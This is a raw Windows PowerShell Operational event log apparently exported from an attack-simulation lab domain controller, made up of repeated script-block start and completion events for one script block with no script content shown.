SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474019
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474018
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474017
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474016
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474015
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474014
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474013
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474012
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474011
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474010
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474009
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474008
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474007
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474006
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474005
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474004
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474003
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474002
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474001
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474000
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473999
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473998
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473997
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473996
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473995
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473994
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473993
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473992
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473991
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473990
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473989
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473988
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473987
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473986
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473985
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473984
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473983
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473982
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473981
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473980
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473979
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473978
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473977
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473976
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473975
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473974
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473973
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473972
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473971
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473970
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473969
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473968
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473967
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473966
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473965
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
